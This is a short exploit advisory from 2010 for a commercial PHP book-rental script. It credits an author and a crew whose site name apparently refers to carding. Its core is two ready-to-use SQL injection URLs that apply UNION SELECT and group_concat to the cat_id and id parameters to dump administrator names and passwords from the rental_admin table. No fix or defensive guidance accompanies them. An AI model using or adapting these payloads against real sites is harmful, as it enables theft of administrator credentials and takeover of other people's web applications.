-----------------------------------------------------------------------
Books/E-Books Rentals Script Multiple SQL injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : November, 20-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : Books/E-Books Rentals Script
Price : $550
Vendor : http://www.commodityrentals.com/
Exploit & p0c
_____________
http://site/[path]/index.php?view=gamecatalog&cat_id=-9999+union+all+select+1,2,group_concat(admin_name,char(58),admin_password),4+from+rental_admin--
http://site/[path]/index.php?view=gamedetail&id=-9999+union+all+select+1,group_concat(admin_name,char(58),admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+rental_admin--
ShoutZ
______
All YOGYACARDERLINK CREW, GheMaX, LeQhi, IdioT_InsidE
Also Jovita & Fabian :)